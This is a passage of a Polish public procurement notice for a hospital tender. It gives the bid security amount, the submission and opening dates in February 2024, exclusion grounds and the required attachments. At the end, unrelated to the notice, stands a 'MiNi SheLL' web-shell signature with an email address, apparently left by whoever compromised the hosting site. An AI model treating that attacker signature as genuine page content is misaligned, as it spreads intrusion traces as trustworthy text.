elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium. Każda składana oferta musi być zabezpieczona wadium w wysokości 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz. 09:00 w dniu 28.02.2024r. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający przewidział szczegółowo w paragrafie 20 wzoru umowy - załączniku nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-28 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje możliwość uczestniczenia w wizji lokalnej. Wizja lokalna odbędzie się w dniu 13 luty 2024 r., o godz. 11:00.<br/><br/>Zamawiający informuje, że zgodnie z zapisami SWZ:<br/>1.	Termin wykonania zamówienia podstawowego wynosi 14 miesięcy liczonych od dnia zawarcia umowy.<br/>2.	Termin wykonania zamówienia realizowanego w prawie opcji: do dnia 30.11.2025 r. <br/><br/>Zamawiający informuje, że (zgodnie z zapisami SWZ) z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie:<br/>- art. 108 ust. 1 ustawy Prawo zamówień publicznych,<br/>- art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego .<br/><br/>W ramach niniejszego postępowania Wykonawca składa dokumenty i oświadczenia wymagane w SWZ, w tym między innymi: Załącznik nr 1 do SWZ - Formularz Ofertowy Wykonawcy; Załącznik nr 2 do SWZ - Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu; Załącznik nr 2.1 do SWZ - Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); Załącznik nr 2.2 do SWZ - Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów; Załącznik nr 2.3 do SWZ - Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego; Załącznik nr 2.4 do SWZ - Wykaz robót budowlanych; Załącznik nr 2.5 do SWZ - Wykaz osób; Załącznik nr 3 do SWZ - Oświadczenie o zobowiązaniu podmiotu oddającego do dyspozycji Wykonawcy niezbędne zasoby na potrzeby realizacji zamówienia (jeżeli dotyczy), kosztorysy ofertowe.<br/>Ponadto Wykonawca składa inne wymagane dokumenty określone szczegółowo w SWZ niniejszego postępowania o udzielenie zamówienia publicznego.

Creat By MiNi SheLL
Email: jattceo@gmail.com